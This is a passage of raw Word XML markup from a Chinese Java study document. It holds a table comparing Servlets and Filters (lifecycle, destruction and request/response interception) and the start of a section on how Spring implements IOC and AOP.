                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5481"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>按照</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>web.xml</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>中的映射配置顺序按照配置条件</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>从后向前</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>调用第一个满足条件的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Servlet</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，调用之前事先执行满足条件的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Filter</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，不存在层次调用</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Servlet</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>问题</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidTr="00F64839">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1587"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>销毁</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5053"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>服务器停止后销毁</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，晚于</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Servlet</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>销毁之后</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5481"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>服务器停止后销毁</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidTr="00F64839">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1587"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>作用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5053"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HttpServletRequest</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>到达</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Servlet</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>之前，拦截客户的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HttpServletRequest</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>根据需要检查</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HttpServletRequest</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，也可以修改</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HttpServletRequest</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>头和数据。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HttpServletResponse</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>到达客户端之前，拦截</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HttpServletResponse</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4. </w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>根据需要检查</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HttpServletResponse</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，也可以修改</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HttpServletResponse</w:t>
            </w:r>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>头和数据。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5481"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F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="350" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64839">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>主要是处理客户端的请求并将其结果发送到客户端。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F64839" w:rsidRPr="00F64839" w:rsidRDefault="00F64839" w:rsidP="00F64839"/>
    <w:p w:rsidR="004A665C" w:rsidRDefault="004A665C" w:rsidP="004A665C">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00534B35" w:rsidRPr="00F41A4C" w:rsidRDefault="00AD43C0" w:rsidP="00534B35">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00534B35" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00534B35" w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidR="00534B35" w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>中怎样实现</w:t>
      </w:r>
      <w:r w:rsidR="00264690">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IOC</w:t>
      </w:r>
      <w:r w:rsidR="00534B35" w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00264690">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00534B35" w:rsidRDefault="00534B35" w:rsidP="009B68C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>反射实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> AOP </w:t>
      </w:r>
      <w:r w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>动态代理模式</w:t>
      </w:r>
      <w:r w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(Spring AOP </w:t>
      </w:r>
      <w:r w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
      <w:r w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00534B35" w:rsidRDefault="00534B35" w:rsidP="009B68C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>OO</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>注重的是我们解决问题的方法</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>封装成</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Method),</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>注重的是许多解决解决问题的方法中的共同点</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
